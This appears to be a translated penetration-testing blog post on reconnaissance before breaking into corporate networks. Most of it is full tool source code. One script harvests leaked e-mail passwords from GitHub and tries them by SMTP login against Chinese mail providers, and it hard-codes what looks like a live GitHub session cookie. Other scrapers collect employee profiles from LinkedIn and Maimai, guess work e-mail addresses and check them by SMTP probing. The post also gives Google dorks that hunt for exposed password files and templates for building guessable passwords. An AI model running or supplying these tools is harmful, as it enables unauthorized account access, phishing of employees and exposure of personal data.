Intranet Penetration Series: A Summary of Information-Gathering Methods, Part 2

Preface

Some methods have already been summarized in earlier posts:

This post complements those two earlier ones. It mainly summarizes information-gathering methods used while trying to get into an intranet (i.e., it still leans toward the pre-exploitation stage).

I. Open-Source Intelligence (OSINT)

1. WHOIS / reverse lookup / related assets
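
The usual starting point is the target's primary domain: WHOIS gives the registrar and registrant contacts, reverse WHOIS on the registrant e-mail turns up sibling domains, and related-asset searches widen the scope from there. A minimal lookup sketch, assuming the third-party python-whois package (which fields come back depends on the registry):

import whois  # third-party: pip install python-whois

record = whois.whois('example.com')  # 'example.com' is a placeholder target
print(record.registrar)
print(record.emails)        # registrant e-mails are the pivot for reverse WHOIS
print(record.name_servers)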

2. GitHub sensitive information

(1) Crawling e-mail credentials from GitHub

Crawls e-mail account/password pairs from GitHub code search and verifies them over SMTP; written in Python 2.
Usage: python Nuggests.py 100 (100 is the number of result pages to crawl, capped at 100)

Mail_Modules.py

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""SMTP login checks; supports the 126, qq, sina and 163 mail providers."""

import smtplib

def _maillogin(smtp_host, label, username, password, url):
    # Try the harvested credentials against the provider's SMTP server
    try:
        smtp = smtplib.SMTP()
        smtp.connect(smtp_host, 25)
        smtp.login(username, password)
        print 'Analysis :' + url
        print 'Loading ' + label + ' Module'
        print username + ':' + password + '  Login OK!'
    except Exception:
        pass  # bad credentials or unreachable server: move on quietly

def maillogin_163(username, password, url):
    _maillogin("smtp.163.com", "163mail", username, password, url)

def maillogin_qq(username, password, url):
    _maillogin("smtp.qq.com", "qq mail", username, password, url)

def maillogin_sina(username, password, url):
    _maillogin("smtp.sina.com", "Sina mail", username, password, url)

def maillogin_126(username, password, url):
    _maillogin("smtp.126.com", "126 mail", username, password, url)

Nuggests.py

#!/usr/bin/env python 
# -*- coding: utf-8 -*-

import requests,sys
from bs4 import BeautifulSoup
from Mail_Modules import maillogin_163,maillogin_qq,maillogin_sina,maillogin_126
urllist = []

def mailfilter(urls,mod):
    usern = ''
    password = ''
    for url in urls:
        try:
            page = requests.get(url).content
            page = page.split()
            # Crude token scan: take the value two tokens after a 'user'/'pass' key
            for index in range(len(page)):
                if 'user' in page[index]:
                    usern = page[index+2].strip(',').replace("'","")
                if 'pass' in page[index]:
                    password = page[index+2].strip(',').replace("'","")
        except:
            pass
        if mod == '163':
            maillogin_163(usern,password,url)
        if mod == 'qq':
            maillogin_qq(usern,password,url)
        if mod == 'sina':
            maillogin_sina(usern,password,url)
        if mod == '126':
            maillogin_126(usern,password,url)

def read_page(keyword,pages):
    pages = int(pages)
    print 'Search Keyword : '+keyword
    print 'Scanning '+str(pages)+' pages from Github!'
    for page in range(pages):
        # GitHub code search requires a logged-in session: replace the Cookie
        # value below with the one from your own authenticated browser session.
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 115Browser/7.2.5',
                   'Cookie': "_octo=GH1.1.1911767667.1480641870; logged_in=yes; dotcom_user=menu88; _ga=GA1.2.1291948085.1480641870; tz=Asia%2FShanghai; _gh_sess=eyJzZXNzaW9uX2lkIjoiNWY4YTVkMTk3YzRhNzg3ZWEwYjM5OWUwZWNhNDY2ZWIiLCJjb250ZXh0IjoiLyIsInNweV9yZXBvIjoibWVudTg4L215cHVibGljIiwic3B5X3JlcG9fYXQiOjE0ODEyNDY5NDN9--170066295059ff1fc3d8b46b50d3c62847ac82eb; user_session=JA153nFX9QfOaFbu2vCdVLPuU_9_K9NvEO4mvMqZ4NaK3TjX; __Host-user_session_same_site=JA153nFX9QfOaFbu2vCdVLPuU_9_K9NvEO4mvMqZ4NaK3TjX"}
        url = 'https://github.com/search?l=PHP&p='+str(page)+'&q='+keyword+'&type=Code&utf8=%E2%9C%93'
        print 'Fetching page '+str(page)+'!'
        pagecon = requests.get(url,headers = headers).content
        soup = BeautifulSoup(pagecon,"html.parser")
        for link in soup.find_all('a'):
            url = link.get('href')
            if 'blob' in url:
                url = url.split('#')[0]
                url = url.split('blob/')[0]+url.split('blob/')[1]
                urllist.append('https://raw.githubusercontent.com'+url)
# Page count is taken from the command line, as described in the usage above
pages = int(sys.argv[1]) if len(sys.argv) > 1 else 5
read_page('smtp+163.com',pages)
urllist = list(set(urllist))
mailfilter(urllist,'163')
urllist =[]
read_page('smtp+qq.com',pages)
urllist = list(set(urllist))
mailfilter(urllist,'qq')
urllist =[]
read_page('smtp+sina.com',pages)
urllist = list(set(urllist))
mailfilter(urllist,'sina')
urllist =[]
read_page('smtp+126.com',pages)
urllist = list(set(urllist))
mailfilter(urllist,'126')

(2) GSIL

Written by 止介: https://github.com/FeeiCN/GSIL
Monitors GitHub for sensitive-information leaks in near real time (15-minute intervals) and sends alert notifications; written in Python 3.

(3) x-patrol

From Xiaomi Security: https://github.com/MiSecurity/x-patrol

More complete than the previous two; written in Go.

3. Google hacking

See the earlier post "Google Hack 方法小结" (a summary of Google hacking techniques); a few representative dorks are shown below.
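
Example dorks for scoping a target (example.com is a placeholder):

site:example.com filetype:xls OR filetype:xlsx intext:password
site:example.com inurl:login OR inurl:admin
site:example.com intitle:"index of"
site:*.example.com -site:www.example.com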

II. Enterprise password dictionaries

1. Dictionary lists

Some dictionaries on GitHub:

Patterns targeting a specific organization (a sketch that expands them follows the list):

['%pwd%123','%user%123','%user%521','%user%2017','%pwd%321','%pwd%521','%user%321','%pwd%123!','%pwd%123!@#','%pwd%1234','%user%2016','%user%123$%^','%user%123!@#','%pwd%2016','%pwd%2017','%pwd%1!','%pwd%2@','%pwd%3#','%pwd%123#@!','%pwd%12345','%pwd%123$%^','%pwd%!@#456','%pwd%123qwe','%pwd%qwe123','%pwd%qwe','%pwd%123456','%user%123#@!','%user%!@#456','%user%1234','%user%12345','%user%123456','%user%123!']
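
Here %user% and %pwd% are placeholders to be filled with harvested account names and company-specific keywords. A minimal sketch of expanding such templates into a concrete dictionary (the sample users and keywords are illustrative):

# Expand %user%/%pwd% templates into concrete password candidates
patterns = ['%pwd%123', '%user%123', '%user%2017', '%pwd%123!@#']
users = ['zhangsan', 'lisi']           # harvested account names (illustrative)
keywords = ['company', 'Company2017']  # company-specific base words (illustrative)

wordlist = set()
for p in patterns:
    for u in users:
        for k in keywords:
            wordlist.add(p.replace('%user%', u).replace('%pwd%', k))
for candidate in sorted(wordlist):
    print(candidate)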

2. Password generation

(1) genpAss

A weak-password generator with Chinese characteristics; it builds candidate passwords from personal information.
The original author deleted the repository; a mirror lives at https://github.com/test98123456/genpAss

(2) passmaker

https://github.com/bit4woo/passmaker
Generates password dictionaries by combining fragments according to custom rules, aimed mainly at enterprise targets; written in Python 2.
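
The core idea, taking the Cartesian product of rule fragments, is easy to sketch (a simplified illustration, not passmaker's actual rule syntax):

import itertools

# Fragments an enterprise password is often assembled from (illustrative)
prefixes = ['zhangsan', 'zs', 'admin']
connectors = ['', '@', '_']
suffixes = ['123', '2017', '888', '123!@#']

for head, mid, tail in itertools.product(prefixes, connectors, suffixes):
    print(head + mid + tail)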

(3) pydictor

https://github.com/LandGrey/pydictor
A powerful generator that can produce all kinds of dictionaries.

III. Gathering information from public data sources

1. LinkedIn

https://github.com/mdsecactivebreach/LinkedInt

Usage:

Providing you with Linkedin Intelligence
Author: Vincent Yiu (@vysec, @vysecurity)
Original version by @DisK0nn3cT
[*] Enter search Keywords (use quotes for more precise results)
"General Motors"

[*] Enter filename for output (exclude file extension)
generalmotors

[*] Filter by Company? (Y/N):
Y

[*] Specify a Company ID (Provide ID or leave blank to automate):


[*] Enter e-mail domain suffix (eg. contoso.com):
gm.com

[*] Select a prefix for e-mail generation (auto,full,firstlast,firstmlast,flast,first.last,fmlast):
auto

[*] Automatically using Hunter IO to determine best Prefix
[!] {first}.{last}
[+] Found first.last prefix

Source:

#!/usr/bin/python
# LinkedInt
# Scrapes LinkedIn without using the LinkedIn API
# Original scraper by @DisK0nn3cT (https://github.com/DisK0nn3cT/linkedin-gatherer)
# Modified by @vysecurity
# - Additions:
# --- UI Updates
# --- Constrain to company filters
# --- Addition of Hunter for e-mail prediction

import socket
import sys
import re
import time
import requests
import subprocess
import json
import argparse
import smtplib
import dns.resolver
import cookielib
import os
import urllib
import math
import urllib2
import string
from bs4 import BeautifulSoup
from thready import threaded

reload(sys)
sys.setdefaultencoding('utf-8')

""" Setup Argument Parameters """
parser = argparse.ArgumentParser(description='Discovery LinkedIn')
parser.add_argument('-u', '--keywords', help='Keywords to search')
parser.add_argument('-o', '--output', help='Output file (do not include extensions)')
args = parser.parse_args()
api_key = "" # Hunter API key
username = "" 	# enter username here
password = ""	# enter password here

if api_key == "" or username == "" or password == "":
        print "[!] Oops, you did not enter your api_key, username, or password in LinkedInt.py"
        sys.exit(0)

def login():
	cookie_filename = "cookies.txt"
	cookiejar = cookielib.MozillaCookieJar(cookie_filename)
	opener = urllib2.build_opener(urllib2.HTTPRedirectHandler(),urllib2.HTTPHandler(debuglevel=0),urllib2.HTTPSHandler(debuglevel=0),urllib2.HTTPCookieProcessor(cookiejar))
	page = loadPage(opener, "https://www.linkedin.com/")
	parse = BeautifulSoup(page, "html.parser")

	csrf = parse.find(id="loginCsrfParam-login")['value']
	
	login_data = urllib.urlencode({'session_key': username, 'session_password': password, 'loginCsrfParam': csrf})
	page = loadPage(opener,"https://www.linkedin.com/uas/login-submit", login_data)
	
	parse = BeautifulSoup(page, "html.parser")
	cookie = ""
	
	try:
		cookie = cookiejar._cookies['.www.linkedin.com']['/']['li_at'].value
	except:
		sys.exit(0)
	
	cookiejar.save()
	os.remove(cookie_filename)
	return cookie

def loadPage(client, url, data=None):
	try:
		response = client.open(url)
	except:
		print "[!] Cannot load main LinkedIn page"
	try:
		if data is not None:
			response = client.open(url, data)
		else:
			response = client.open(url)
		return ''.join(response.readlines())
	except:
		sys.exit(0)

def get_search():

    body = ""
    csv = []
    css = """<style>
    #employees {
        font-family: "Trebuchet MS", Arial, Helvetica, sans-serif;
        border-collapse: collapse;
        width: 100%;
    }
    #employees td, #employees th {
        border: 1px solid #ddd;
        padding: 8px;
    }
    #employees tr:nth-child(even){background-color: #f2f2f2;}
    #employees tr:hover {background-color: #ddd;}
    #employees th {
        padding-top: 12px;
        padding-bottom: 12px;
        text-align: left;
        background-color: #4CAF50;
        color: white;
    }
    </style>
    """

    header = """<center><table id=\"employees\">
             <tr>
             <th>Photo</th>
             <th>Name</th>
             <th>Possible Email:</th>
             <th>Job</th>
             <th>Location</th>
             </tr>
             """

    # Do we want to automatically get the company ID?


    if bCompany:
	    if bAuto:
	        # Automatic
	        # Grab from the URL 
	        companyID = 0
	        url = "https://www.linkedin.com/voyager/api/typeahead/hits?q=blended&query=%s" % search
	        headers = {'Csrf-Token':'ajax:0397788525211216808', 'X-RestLi-Protocol-Version':'2.0.0'}
	        cookies['JSESSIONID'] = 'ajax:0397788525211216808'
	        r = requests.get(url, cookies=cookies, headers=headers)
	        content = json.loads(r.text)
	        firstID = 0
	        for i in range(0,len(content['elements'])):
	        	try:
	        		companyID = content['elements'][i]['hitInfo']['com.linkedin.voyager.typeahead.TypeaheadCompany']['id']
	        		if firstID == 0:
	        			firstID = companyID
	        		print "[Notice] Found company ID: %s" % companyID
	        	except:
	        		continue
	        companyID = firstID
	        if companyID == 0:
	        	print "[WARNING] No valid company ID found in auto, please restart and find your own"
	    else:
	        # Don't auto, use the specified ID
	        companyID = bSpecific

	    print
	    
	    print "[*] Using company ID: %s" % companyID

	# Fetch the initial page to get results/page counts
    if bCompany == False:
        url = "https://www.linkedin.com/voyager/api/search/cluster?count=40&guides=List()&keywords=%s&origin=OTHER&q=guided&start=0" % search
    else:
        url = "https://www.linkedin.com/voyager/api/search/cluster?count=40&guides=List(v->PEOPLE,facetCurrentCompany->%s)&origin=OTHER&q=guided&start=0" % (companyID)
    
    print url
    
    headers = {'Csrf-Token':'ajax:0397788525211216808', 'X-RestLi-Protocol-Version':'2.0.0'}
    cookies['JSESSIONID'] = 'ajax:0397788525211216808'
    #print url
    r = requests.get(url, cookies=cookies, headers=headers)
    content = json.loads(r.text)
    data_total = content['elements'][0]['total']

    # Calculate pages off final results at 40 results/page
    pages = data_total / 40

    if pages == 0:
    	pages = 1

    if data_total % 40 == 0:
        # Because we count from 0... subtract a page if there are no leftover results on the last page
        pages = pages - 1 

    if pages == 0: 
    	print "[!] Try to use quotes in the search name"
    	sys.exit(0)
    
    print "[*] %i Results Found" % data_total
    if data_total > 1000:
        pages = 25
        print "[*] LinkedIn only allows 1000 results. Refine keywords to capture all data"
    print "[*] Fetching %i Pages" % pages
    print

    for p in range(pages):
        # Request results for each page using the start offset
        if bCompany == False:
            url = "https://www.linkedin.com/voyager/api/search/cluster?count=40&guides=List()&keywords=%s&origin=OTHER&q=guided&start=%i" % (search, p*40)
        else:
            url = "https://www.linkedin.com/voyager/api/search/cluster?count=40&guides=List(v->PEOPLE,facetCurrentCompany->%s)&origin=OTHER&q=guided&start=%i" % (companyID, p*40)
        #print url
        r = requests.get(url, cookies=cookies, headers=headers)
        content = r.text.encode('UTF-8')
        content = json.loads(content)
        print "[*] Fetching page %i with %i results" % ((p),len(content['elements'][0]['elements']))
        for c in content['elements'][0]['elements']:
            if 'com.linkedin.voyager.search.SearchProfile' in c['hitInfo'] and c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['headless'] == False:
                try:
                    data_industry = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['industry']
                except:
                    data_industry = ""    
                data_firstname = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['firstName']
                data_lastname = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['lastName']
                data_slug = "https://www.linkedin.com/in/%s" % c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['publicIdentifier']
                data_occupation = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['occupation']
                data_location = c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['location']
                try:
                    data_picture = "https://media.licdn.com/mpr/mpr/shrinknp_400_400%s" % c['hitInfo']['com.linkedin.voyager.search.SearchProfile']['miniProfile']['picture']['com.linkedin.voyager.common.MediaProcessorImage']['id']
                except:
                    print "[*] No picture found for %s %s, %s" % (data_firstname, data_lastname, data_occupation)
                    data_picture = ""

                # in case the last name is multi-part, we will split it down

                parts = data_lastname.split()

                name = data_firstname + " " + data_lastname
                fname = ""
                mname = ""
                lname = ""

                if len(parts) == 1:
                    fname = data_firstname
                    mname = '?'
                    lname = parts[0]
                elif len(parts) == 2:
                    fname = data_firstname
                    mname = parts[0]
                    lname = parts[1]
                elif len(parts) >= 3:
                    fname = data_firstname
                    lname = parts[0]
                else:
                    fname = data_firstname
                    lname = '?'

                fname = re.sub('[^A-Za-z]+', '', fname)
                mname = re.sub('[^A-Za-z]+', '', mname)
                lname = re.sub('[^A-Za-z]+', '', lname)

                if len(fname) == 0 or len(lname) == 0:
                    # invalid user, let's move on, this person has a weird name
                    continue

                if prefix == 'full':
                    user = '{}{}{}'.format(fname, mname, lname)
                if prefix == 'firstlast':
                    user = '{}{}'.format(fname, lname)
                if prefix == 'firstmlast':
                    user = '{}{}{}'.format(fname, mname[0], lname)
                if prefix == 'flast':
                    user = '{}{}'.format(fname[0], lname)
                if prefix == 'first.last':
                    user = '{}.{}'.format(fname, lname)
                if prefix == 'fmlast':
                    user = '{}{}{}'.format(fname[0], mname[0], lname)
                if prefix == 'lastfirst':
                	user = '{}{}'.format(lname, fname)

                email = '{}@{}'.format(user, suffix)

                body += "<tr>" \
                    "<td><a href=\"%s\"><img src=\"%s\" width=200 height=200></a></td>" \
                    "<td><a href=\"%s\">%s</a></td>" \
                    "<td>%s</td>" \
                    "<td>%s</td>" \
                    "<td>%s</td>" \
                    "<a>" % (data_slug, data_picture, data_slug, name, email, data_occupation, data_location)
                if validateEmail(suffix,email):
                    csv.append('"%s","%s","%s","%s","%s", "%s"' % (data_firstname, data_lastname, name, email, data_occupation, data_location.replace(",",";")))
                foot = "</table></center>"
                f = open('{}.html'.format(outfile), 'wb')
                f.write(css)
                f.write(header)
                f.write(body)
                f.write(foot)
                f.close()
                f = open('{}.csv'.format(outfile), 'wb')
                f.writelines('\n'.join(csv))
                f.close()
            else:
                print "[!] Headless profile found. Skipping"
        print

def validateEmail(domain,email):
    """
    Functionality and Code was adapted from the SimplyEmail Project: https://github.com/SimplySecurity/SimplyEmail
    """
    #Setting Variables
    UserAgent = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
    mxhost = ""
    FinalList = []
    hostname = socket.gethostname()
    
    #Getting MX Record
    MXRecord = []
    try:
        print ' [*] Attempting to resolve MX records!'
        answers = dns.resolver.query(domain, 'MX')
        for rdata in answers:
            data = {
                "Host": str(rdata.exchange),
                "Pref": int(rdata.preference),
            }
            MXRecord.append(data)
        # Now find the lowest value in the pref
        Newlist = sorted(MXRecord, key=lambda k: k['Pref'])
        # Set the MX record
        mxhost = Newlist[0]
        val = ' [*] MX Host: ' + str(mxhost['Host'])
        print val
    except Exception as e:
        error = ' [!] Failed to get MX record: ' + str(e)
        print error

    #Checking Email Address
    socket.setdefaulttimeout(10)
    server = smtplib.SMTP(timeout=10)
    server.set_debuglevel(0)
    code = 0  # stays 0 if the SMTP conversation below fails
    try:
        print " [*] Checking for valid email: " + str(email)
        server.connect(mxhost['Host'])
        server.helo(hostname)
        server.mail('email@gmail.com')
        code,message = server.rcpt(str(email))
        server.quit()
    except Exception as e:
        print e
    
    if code == 250:
        #print "Valid Email Address Found: %s" % email
        return True
    else:
        #print "Email not valid %s" % email
        return False

def banner():
        with open('banner.txt', 'r') as f:
            data = f.read()

            print "\033[1;31m%s\033[0;0m" % data
            print "\033[1;34mProviding you with Linkedin Intelligence"
            print "\033[1;32mAuthor: Vincent Yiu (@vysec, @vysecurity)\033[0;0m"
            print "\033[1;32mOriginal version by @DisK0nn3cT\033[0;0m"

def authenticate():
    try:
    	a = login()
    	print a
        session = a
        if len(session) == 0:
            sys.exit("[!] Unable to login to LinkedIn.com")
        print "[*] Obtained new session: %s" % session
        cookies = dict(li_at=session)
    except Exception, e:
        sys.exit("[!] Could not authenticate to linkedin. %s" % e)
    return cookies

if __name__ == '__main__':
    banner()
    # Prompt user for data variables
    search = args.keywords if args.keywords!=None else raw_input("[*] Enter search Keywords (use quotes for more precise results)\n")
    print 
    outfile = args.output if args.output!=None else raw_input("[*] Enter filename for output (exclude file extension)\n")
    print 
    while True:
        bCompany = raw_input("[*] Filter by Company? (Y/N): \n")
        if bCompany.lower() == "y" or bCompany.lower() == "n":
            break
        else:
            print "[!] Incorrect choice"

    if bCompany.lower() == "y":
        bCompany = True
    else:
        bCompany = False

    bAuto = True
    bSpecific = 0
    prefix = ""
    suffix = ""

    print

    if bCompany:
	    while True:
	        bSpecific = raw_input("[*] Specify a Company ID (Provide ID or leave blank to automate): \n")
	        if bSpecific != "":
	            bAuto = False
	            if bSpecific != 0:
	                try:
	                    int(bSpecific)
	                    break
	                except:
	                    print "[!] Incorrect choice, the ID either has to be a number or blank"
	                
	            else:
	                print "[!] Incorrect choice, the ID either has to be a number or blank"
	        else:
	            bAuto = True
	            break

    print

    
    while True:
        suffix = raw_input("[*] Enter e-mail domain suffix (eg. contoso.com): \n")
        suffix = suffix.lower()
        if "." in suffix:
            break
        else:
            print "[!] Incorrect e-mail? There's no dot"

    print

    while True:
        prefix = raw_input("[*] Select a prefix for e-mail generation (auto,full,firstlast,firstmlast,flast,first.last,fmlast,lastfirst): \n")
        prefix = prefix.lower()
        print
        if prefix == "full" or prefix == "firstlast" or prefix == "firstmlast" or prefix == "flast" or prefix =="first" or prefix == "first.last" or prefix == "fmlast" or prefix == "lastfirst":
            break
        elif prefix == "auto":
            #if auto prefix then we want to use hunter IO to find it.
            print "[*] Automaticly using Hunter IO to determine best Prefix"
            url = "https://hunter.io/trial/v2/domain-search?offset=0&domain=%s&format=json" % suffix
            r = requests.get(url)
            content = json.loads(r.text)
            if "status" in content:
                print "[!] Rate limited by Hunter IO trial"
                url = "https://api.hunter.io/v2/domain-search?domain=%s&api_key=%s" % (suffix, api_key)
                #print url
                r = requests.get(url)
                content = json.loads(r.text)
                if "status" in content:
                    print "[!] Rate limited by Hunter IO Key"
                    continue
            #print content
            prefix = content['data']['pattern']
            print "[!] %s" % prefix
            if prefix:
                prefix = prefix.replace("{","").replace("}", "")
                if prefix == "full" or prefix == "firstlast" or prefix == "firstmlast" or prefix == "flast" or prefix =="first" or prefix == "first.last" or prefix == "fmlast" or prefix == "lastfirst":
                    print "[+] Found %s prefix" % prefix
                    break
                else:
                    print "[!] Automatic prefix search failed, please insert a manual choice"
                    continue
            else:
                print "[!] Automatic prefix search failed, please insert a manual choice"
                continue
        else:
            print "[!] Incorrect choice, please select a value from (auto,full,firstlast,firstmlast,flast,first.last,fmlast)"

    print 


    
    # URL Encode for the querystring
    search = urllib.quote_plus(search)
    cookies = authenticate()
  
    
    # Initialize Scraping
    get_search()

    print "[+] Complete"

2. Maimai

https://github.com/Ridter/Mailget

Usage:

usage: Mailget.py [-h] [-d DOMAIN] [-cn COMNAME] [-o OUTPUT] [-pr PREFIX]

Discovery Maimai

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        The domain want to search
  -cn COMNAME, --comname COMNAME
                        The company name (example: 饿了么)
  -o OUTPUT, --output OUTPUT
                        Output file (do not include extensions)
  -pr PREFIX, --prefix PREFIX
                        Select a prefix for e-mail generation (auto,full,first
                        last,firstmlast,flast,first.last,fmlast,lastfirst)

Source:

#!/usr/bin/env python
#-*- coding:utf-8 -*-
import pinyin
import requests
import json
import argparse
import sys
from urllib import unquote
import csv
import codecs
import re
reload(sys)
sys.setdefaultencoding("utf-8")

# Configure the account, password, and Hunter API key
api_key = ""  # Hunter API key
pa = ""  # enter pa, example:+86
phone = "" 	# enter username here
password = ""  # enter password here

parser = argparse.ArgumentParser(description='Discovery Maimai')
parser.add_argument('-d', '--domain', help='The domain want to search')
parser.add_argument('-cn', '--comname',
                    help='The company name (example: 饿了么)')
parser.add_argument(
    '-o', '--output', help='Output file (do not include extensions)')
parser.add_argument('-pr', '--prefix', default='auto',
                    help='Select a prefix for e-mail generation (auto,full,firstlast,firstmlast,flast,first.last,fmlast,lastfirst)')
args = parser.parse_args()
domain = args.domain
outname = args.output
comname = args.comname
prefixinput = args.prefix
prefix = ""


#HTML CSS
HTML_CSS = '''
<!-- CSS goes in the document HEAD or added to your external stylesheet -->
<style type="text/css">
table.gridtable {
	font-family: verdana,arial,sans-serif;
	font-size:11px;
	color:#333333;
	border-width: 1px;
	border-color: #666666;
	border-collapse: collapse;
}
table.gridtable th {
	border-width: 1px;
	padding: 8px;
	border-style: solid;
	border-color: #666666;
	background-color: #dedede;
}
table.gridtable td {
	border-width: 1px;
	padding: 8px;
	border-style: solid;
	border-color: #666666;
	background-color: #ffffff;
}
</style>
<!-- Table goes in the document BODY -->
<table class="gridtable">
<tr><th>Avatar</th><th>Name</th><th>Email</th><th>Position</th><th>Location</th></tr>
'''

HTML_END = "</table>"
HTML_BODY = ""
CSV_DATA = []
logo = '''
                _  _               _   
  /\/\    __ _ (_)| |  __ _   ___ | |_ 
 /    \  / _` || || | / _` | / _ \| __|
/ /\/\ \| (_| || || || (_| ||  __/| |_ 
\/    \/ \__,_||_||_| \__, | \___| \__|
                      |___/            
'''
# Check whether a string contains Chinese characters
def check_contain_chinese(check_str):
    for ch in check_str.decode('utf-8'):
        if u'\u4e00' <= ch <= u'\u9fff':
            return True
    return False

# Convert a Chinese name to pinyin (a py2 str is UTF-8 bytes, 3 bytes per Chinese character, hence the [0:3] slices)
def Nametopinyin(name):
    try:
        if check_contain_chinese(name):
            match = re.search('[A-Za-z0-9]+', name)
            if match:
                return None,None,None
            else:
                name = name.replace(' ', '')  # assign: str.replace returns a new string
                if len(name)>9:
                    last = pinyin.get(name[0:6], format='strip')
                    mname = pinyin.get(name[6:9],format='strip')
                    first = pinyin.get(name[9:], format='strip')
                elif len(name) > 6:
                    last = pinyin.get(name[0:3], format='strip')
                    mname = pinyin.get(name[3:6], format='strip')
                    first = pinyin.get(name[6:], format='strip')
                else:
                    last = pinyin.get(name[0:3], format='strip')
                    mname = ""
                    first = pinyin.get(name[3:], format='strip')
                return last, mname, first 
        else:
            return name,None,None
    except:
        return None,None,None
# Determine the e-mail prefix format
def getprefix(prefix,domain):
        prefix = prefix.lower()
        domain = domain.lower()
        if prefix == "full" or prefix == "firstlast" or prefix == "firstmlast" or prefix == "flast" or prefix == "first" or prefix == "first.last" or prefix == "fmlast" or prefix == "lastfirst":
            print "[*] use input prefix for e-mail generation"
            return prefix
        elif prefix == "auto":
            # Automatically detect the e-mail prefix pattern via Hunter IO.
            print "[*] Automaticly using Hunter IO to determine best Prefix of \"{}\"".format(domain)
            url = "https://hunter.io/trial/v2/domain-search?offset=0&domain=%s&format=json" % domain
            r = requests.get(url)
            content = json.loads(r.text)
            if "status" in content:
                print "[!] Rate limited by Hunter IO trial"
                url = "https://api.hunter.io/v2/domain-search?domain=%s&api_key=%s" % (
                    domain, api_key)
                #print url
                r = requests.get(url)
                content = json.loads(r.text)
                if "status" in content:
                    print "[!] Rate limited by Hunter IO Key"
            #print content
            prefix = content['data']['pattern']
            print "[!] %s" % prefix
            if prefix:
                prefix = prefix.replace("{", "").replace("}", "")
                if prefix == "full" or prefix == "firstlast" or prefix == "firstmlast" or prefix == "flast" or prefix == "first" or prefix == "first.last" or prefix == "fmlast" or prefix == "lastfirst":
                    print "[+] Found %s prefix" % prefix
                    return prefix
                else:
                    print "[!] Automatic prefix search failed, please insert a manual choice"
            else:
                print "[!] Automatic prefix search failed, please insert a manual choice"
        else:
            print "[!] Incorrect choice, please select a value from (auto,full,firstlast,firstmlast,flast,first.last,fmlast)"
        return None

# Automated Maimai login
def maimailogin(pa,phone,password):
    try:
        session = requests.session()
        login_data={
            'm': phone,
            'p': password,
            'to':'https://maimai.cn/im/',
            'pa': pa
        }
        session.post('https://acc.maimai.cn/login',data=login_data)
        return session
    except:
        print "[-] Login error!"
        exit(0)

# Fetch contact information for the target company
def getmailinfo(session, comname):
    comname = unquote(comname)
    page = 0
    try:
        while True:
            contactUrl = 'https://maimai.cn/search/contacts?count=5000&page={}&query=&dist=0&company={}&forcomp=1&searchTokens=&highlight=false&school=&me=&webcname=&webcid=&jsononly=1'.format(page,comname)
            res = session.get(contactUrl).text
            jsonObj = json.loads(res)
            contacts = jsonObj['data']['contacts']
            print "[*] Get the {} page of data..".format(page+1)
            handledata(contacts)
            page = page + 1
            if len(contacts) == 0:
                break
    except:
        print "[-] Get data error !"
            
# Process contact records and generate e-mail addresses
def handledata(data):
    for content in data:
        user =""
        name = content['contact']['name']
        avatar = content['contact']['avatar']
        loc = content['contact']['loc']
        compos = content['contact']['compos']
        #print name, avatar, loc, compos
        name = name.encode('utf-8')
        lname, mname, fname = Nametopinyin(name)
        if fname != None:
            if prefix == "full":
                user = '{}{}{}'.format(mname,fname,lname)
            if prefix == "firstlast":
                user = '{}{}{}'.format(mname,fname,lname)
            if prefix == "firstmlast":
                if len(mname) == 0:
                    user = '{}{}{}'.format(mname, fname, lname)
                else:
                    user = '{}{}{}'.format(mname[0],fname, lname)
            if prefix == "flast":
                user = '{}{}'.format(fname[0], lname)
            if prefix == "first.last":
                user = '{}{}.{}'.format(mname,fname,lname)
            if prefix == "fmlast":
                if len(mname) == 0:
                    user = '{}{}{}'.format(mname, fname[0], lname)
                else:
                    user = '{}{}{}'.format(mname[0], fname[0], lname)
            if prefix == "lastfirst":
                user = '{}{}{}'.format(lname,mname,fname)
        elif lname!= None:
            user = lname
        if user !="":
            mail = "{}@{}".format(user,domain)
            writetofile(avatar, mail, name, compos, loc, outname)

# Append a record to the HTML and CSV buffers
def writetofile(avatar, mail, name, compos, loc, outname):
    global HTML_BODY,CSV_DATA
    CSV_TMP = name, compos, loc, mail
    CSV_DATA.append(CSV_TMP)
    HTML_TMP = "<tr><td><img src=\"{}\" width=50 height=50></td><td>{}</td><td>{}</td><td>{}</td><td>{}</td></tr>\n".format(avatar, name, mail, compos, loc)
    HTML_BODY = HTML_BODY+HTML_TMP

def main():
    print logo
    if len(api_key) == 0 or len(phone) == 0 or len(password) == 0 or len(pa)==0:
        print "[!] Please config the file!"
        exit(0)
    if domain == None:
        print "[!] Please input the domain name!"
        exit(0)
    if outname == None:
        print "[!] Please input the outfile name!"
        exit(0)
    if comname == None:
        print "[!] Please input the company name!"
        exit(0)
    global prefix
    prefix = getprefix(prefixinput, domain)
    if prefix == None:
        exit(0)
    print "[*] Trying to login Maimai."
    session =maimailogin(pa, phone, password)
    if session:
        print "[+] Login success ! Begin to get mails !"
    getmailinfo(session, comname)
    # Write the HTML report
    print "[*] Writing HTML Report to {}.html".format(outname)
    html = open('{}.html'.format(outname), 'a+')
    htmldata = HTML_CSS+HTML_BODY+HTML_END
    html.write(htmldata)
    html.close()
    # Write the CSV report
    print "[*] Writing CSV Report to {}.csv".format(outname)
    f = open('{}.csv'.format(outname), 'a+')
    f.write(codecs.BOM_UTF8)
    w = csv.writer(f, quoting=csv.QUOTE_NONNUMERIC)
    for line in CSV_DATA:
        w.writerow(line)
    f.close()
    print "[+] Done !"

if __name__ == '__main__':
    main()

3. Multi-source

https://github.com/laramies/theHarvester
Extremely capable, covering a large number of public data sources.
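
A typical invocation looks like this (flag names have shifted between releases, so check --help for your version): -d sets the target domain, -b picks the data source (google, bing, linkedin, all, ...), -l caps the number of results, and -f writes an HTML/XML report.

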